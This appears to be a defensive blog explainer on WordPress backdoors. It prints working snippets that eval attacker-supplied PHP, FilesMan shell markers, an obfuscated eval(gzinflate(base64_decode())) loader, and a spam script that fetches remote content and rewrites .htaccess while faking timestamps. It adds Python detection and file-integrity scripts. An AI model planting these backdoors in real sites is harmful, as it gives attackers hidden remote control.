Examples of Website Backdoors

It is quite common for hackers to place a “backdoor” on a site they have hacked. A backdoor can give a hacker continued access to the site even if the site owners have already changed their account passwords. Backdoor scripts will vary from hundreds of lines of code to 1-2 lines of code.

These are backdoors I see on WordPress sites, typically in the file wp-config.php…

if (isset($_REQUEST['FILE'])){$_FILE =$_REQUEST['12722f6d103997f30e9765d0153305']; $_FILE(stripslashes($_REQUEST['HOST']));}


if(isset($_REQUEST['ch']) && (md5($_REQUEST['ch']) == '970a023a0983e5b4c9a2d3dd6adbd0b8') && isset($_REQUEST['php_code'])) { eval($_REQUEST['php_code']); exit(); }

This simple backdoor is tough to spot when it’s tucked into hundreds of lines of PHP code!

$_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;

This single line of code is found in a file added to sites by the hackers, frequently disguised as part of a plugin or a theme. When the hackers request this file, they can execute any PHP code contained in the variable on the site.

The listing below is for a very common backdoor script called ‘FilesMan’…

<?php $auth_pass = ""; $color = "#df5"; $default_action = "FilesMan"; $default_charset = "Windows-1251";

** or entries similar to this **

$auth_pass = "47a85"."6c68".'e623468d84123'.'e87881d1e3';$color = "#df5";$default_action = "File".'sMa'.'n';$default_use_ajax = true;$default_charset = 'Windows-'.'1251';

** splitting up "File".'sMa'.'n' makes it harder to find using tools like Grep **

preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'[several thousand characters of base64-encoded payload omitted]'\x29\x29\x29\x3B","."); ?>

The hex-escaped string passed to preg_replace() decodes to eval(gzinflate(base64_decode('…'))); and the /e modifier makes preg_replace() evaluate that replacement as PHP, so the compressed payload runs every time the file is requested. This code is a backdoor used with a lot of the spam hacks. The backdoor writes or rewrites the .htaccess file and a PHP file that contains the conditions: is the user agent a “bot”? If yes, add the spammy content. The hackers hide that file under an innocuous name, say .users.php, and stick it in the least-checked folder on the site. In a WordPress site of mine, the “filesman” file was named ajax.php and it was placed in the folder wp-admin/js/.
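As an added, defender-side illustration (not code from the original post), the following Python script applies the observations above to PHP source: it joins split literals such as "File".'sMa'.'n', decodes \xNN escapes so the hidden eval(gzinflate(base64_decode( text becomes visible, and then flags eval() on request data, preg_replace() with the /e modifier and the FilesMan markers. The sample files and their paths are constructed for the demo.

```python
import re

# Constructed sample files modelled on the backdoors above; the paths are hypothetical.
SAMPLES = {
    "wp-content/plugins/x/e.php": "<?php $_REQUEST[e] ? eval( base64_decode( $_REQUEST[e] ) ) : exit;",
    "wp-admin/js/ajax.php": r'''<?php $default_action = "File".'sMa'.'n';
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'AAAA'\x29\x29\x29\x3B",".");''',
    "wp-content/themes/y/search.php": "<?php echo htmlspecialchars($_GET['q'] ?? ''); ?>",
}

# Indicators in the order they are reported; each is a regex over the normalised source.
INDICATORS = [
    ("eval on request data", re.compile(r"eval\s*\(.*?\$_(REQUEST|GET|POST|COOKIE)\b", re.S)),
    ("eval(base64_decode(...))", re.compile(r"eval\s*\(\s*base64_decode")),
    ("eval(gzinflate(base64_decode( chain", re.compile(r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode")),
    ("preg_replace with /e modifier", re.compile(r"preg_replace\s*\(\s*[\"']/.*?/[a-z]*e[a-z]*[\"']")),
    ("FilesMan shell markers", re.compile(r"FilesMan|\$auth_pass\b|\$default_action\b")),
    ("long base64-looking literal", re.compile(r"[\"'][A-Za-z0-9+/=]{120,}[\"']")),
]


def normalize(code: str) -> str:
    # Join "File".'sMa'.'n' style split literals, then decode \xNN escapes so the
    # hidden eval(gzinflate(base64_decode( text becomes visible to the regexes.
    code = re.sub(r"[\"']\s*\.\s*[\"']", "", code)
    return re.sub(r"\\x([0-9A-Fa-f]{2})", lambda m: chr(int(m.group(1), 16)), code)


def scan(code: str) -> list[str]:
    """Names of every indicator that fires on one PHP source (heuristic; expect some false positives)."""
    text = normalize(code)
    return [name for name, rx in INDICATORS if rx.search(text)]


def scan_samples() -> dict[str, list[str]]:
    return {path: scan(src) for path, src in SAMPLES.items()}


if __name__ == "__main__":
    for path, hits in scan_samples().items():
        print(f"{path}: {', '.join(hits) or 'clean'}")
```

Point scan() at the real files under wp-content and wp-admin and review every hit by hand; the patterns are deliberately broad, so a legitimate plugin can trip one.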

Now let's see some of that malicious code and what in the hell it does…

Example 1:

if ( extension_loaded( "curl" ) ) {
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, "http://2ndParty-Site.com/cgi-bin/cnt.txt" );
    curl_setopt( $ch, CURLOPT_HEADER, 0 );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    $the-spam-content = curl_exec( $ch );
    curl_close( $ch );
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, "http://2ndParty-Site.com/cgi-bin/ht1.txt" );
    curl_setopt( $ch, CURLOPT_HEADER, 0 );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    $ht1_code = curl_exec( $ch );
    curl_close( $ch );
    $ch = curl_init();
    curl_setopt( $ch, CURLOPT_URL, "http://2ndParty-Site.com/cgi-bin/ht2.txt" );
    curl_setopt( $ch, CURLOPT_HEADER, 0 );
    curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 );
    $ht2_code = curl_exec( $ch );
    curl_close( $ch );
}

The first part of the code checks whether cURL is available; if it is, the contents of three files are retrieved from a second-party site using cURL and stored in variables:

http://2ndParty-Site.com/cgi-bin/cnt.txt -> $the-spam-content
http://2ndParty-Site.com/cgi-bin/ht1.txt -> $ht1_code
http://2ndParty-Site.com/cgi-bin/ht2.txt -> $ht2_code

Example 2:

{
    $the-spam-content = @file_get_contents( "http://2ndParty-Site.com/cgi-bin/cnt.txt" );
    $ht1_code = @file_get_contents( "http://2ndParty-Site.com/cgi-bin/ht1.txt" );
    $ht2_code = @file_get_contents( "http://2ndParty-Site.com/cgi-bin/ht2.txt" );
}

This portion of the code (most likely the branch taken when cURL is not available) attempts to retrieve the content of the same three files using the PHP function ‘file_get_contents’. The ‘@’ character is used in PHP to suppress error messages. Again, the contents of each of the three files are stored in a separate variable.

Example 3:

if ( is_file( "[site path]/public_html/index.html" ) ) { $index = "[site path]/public_html/index.html"; }
if ( is_file( "[site path]/public_html/index.htm" ) ) { $index = "[site path]/public_html/index.htm"; }
if ( is_file( "[site path]/public_html/.htaccess" ) ) { $index = "[site path]/public_html/.htaccess"; }
if ( is_file( "[site path]/public_html/favicon.ico" ) ) { $index = "[site path]/public_html/favicon.ico"; }
if ( is_file( "[site path]/public_html/index.php" ) ) { $index = "[site path]/public_html/index.php"; }
if ( is_file( "[site path]/public_html/common.php" ) ) { $index = "[site path]/public_html/common.php"; }

This part of the code checks, in turn, whether each of the files index.html, index.htm, .htaccess, favicon.ico, index.php and common.php exists and, for each one that does, stores its path in the variable $index. Because every later check overwrites the variable, $index ends up pointing at the last file in that list which exists on the site.

Example 4:

$time = filemtime( $index );
$chmod = substr( sprintf( "%o", fileperms( $index ) ), -4 );
$chmod = trim( $chmod );
$chmod = intval( $chmod, 8 );

Using the path/file name from the previous step, this code stores the current values of the “last mod time” and the file permissions of the file in the variables $time and $chmod respectively.

Example 5:

@unlink( "[site path]/public_html/common.php" );
$fp = fopen( "[site path]/public_html/common.php", "w" );
fputs( $fp, $the-spam-content );
fclose( $fp );
@chmod( "[site path]/public_html/common.php", $chmod );
touch( "[site path]/public_html/common.php", $time );

Using the PHP functions ‘fopen’ and ‘fputs’, this script writes the content of the variable ‘$the-spam-content’ into the file ‘common.php’. In PHP, the “w” mode passed to fopen tells PHP to truncate the file if it already exists and then write the contents of the variable into it, or to create the file if it does not exist and write the contents into the new file. The last two lines set the file permissions (chmod) and the last modification time (touch) of ‘common.php’ to the values captured in the step above. The file ‘common.php’ now has the same permissions and timestamp as the site's index file or favicon, so a listing sorted by modification date will not show it as recently changed.

Example 6:

$htaccess = str_replace( "#####INCLUDE#####", $ht2_code, $ht1_code );
@unlink( "[site path]/public_html/.htaccess" );
$fp = fopen( "[site path]/public_html/.htaccess", "w" );
fputs( $fp, $htaccess );
fclose( $fp );
@chmod( "[site path]/public_html/.htaccess", $chmod );
touch( "[site path]/public_html/.htaccess", $time );

This block of code inserts the hacker's malicious content into the .htaccess file: it builds the new file by substituting $ht2_code for the #####INCLUDE##### marker inside $ht1_code, deletes the site's existing .htaccess, writes the result in its place, and again applies the permissions and timestamp captured earlier so the rewritten file looks untouched.
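As an added example (not from the original post), this Python script shows how a defender can still catch the chmod()/touch() cloning in Examples 4 to 6: each file's content hash is compared against a baseline, so a rewritten .htaccess whose mtime now equals another file's, or a new common.php that arrives already wearing an existing file's timestamp, is reported even though a "recently modified" listing would miss both. The docroot, file contents and timestamps are constructed for the demo.

```python
import hashlib
import os
import tempfile
from pathlib import Path

def snapshot(root: str) -> dict[str, tuple[int, str]]:
    """Record (mtime_ns, sha256) for every file below root, keyed by relative path."""
    snap = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            digest = hashlib.sha256(Path(path).read_bytes()).hexdigest()
            snap[os.path.relpath(path, root)] = (os.stat(path).st_mtime_ns, digest)
    return snap

def audit(before: dict, after: dict) -> dict[str, str]:
    """Compare two snapshots; an mtime equal to a pre-existing file's is the touch() trick above."""
    old_mtimes = {mtime for mtime, _ in before.values()}
    findings = {}
    for rel, (mtime, digest) in after.items():
        if rel not in before:
            findings[rel] = "new file" + (", mtime cloned from an existing file" if mtime in old_mtimes else "")
        elif digest != before[rel][1]:
            how = "preserved" if mtime == before[rel][0] else ("cloned from another file" if mtime in old_mtimes else "changed too")
            findings[rel] = f"content changed, mtime {how}"
    for rel in before.keys() - after.keys():
        findings[rel] = "deleted"
    return findings

def demo() -> dict[str, str]:
    """Constructed docroot (hypothetical): baseline it, then replay the writes from Examples 3-6."""
    with tempfile.TemporaryDirectory() as root:
        index, htaccess = Path(root, "index.php"), Path(root, ".htaccess")
        index.write_text("<?php /* site index */")
        htaccess.write_text("RewriteEngine On\n")
        os.utime(index, ns=(1_600_000_000_000_000_000,) * 2)     # fixed, distinct mtimes
        os.utime(htaccess, ns=(1_500_000_000_000_000_000,) * 2)
        baseline = snapshot(root)
        # Attacker steps: $index is index.php, so its mtime is copied onto the dropped files.
        stolen = index.stat()
        common = Path(root, "common.php")
        common.write_text("<?php /* spam content */")
        htaccess.write_text("RewriteEngine On\n# injected rules\n")
        for path in (common, htaccess):
            os.utime(path, ns=(stolen.st_atime_ns, stolen.st_mtime_ns))
        return audit(baseline, snapshot(root))

if __name__ == "__main__":
    print(demo())
```

In practice, store the baseline from snapshot() off the server (the same attacker who writes common.php can rewrite a baseline kept in the docroot) and run audit() from a cron job.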
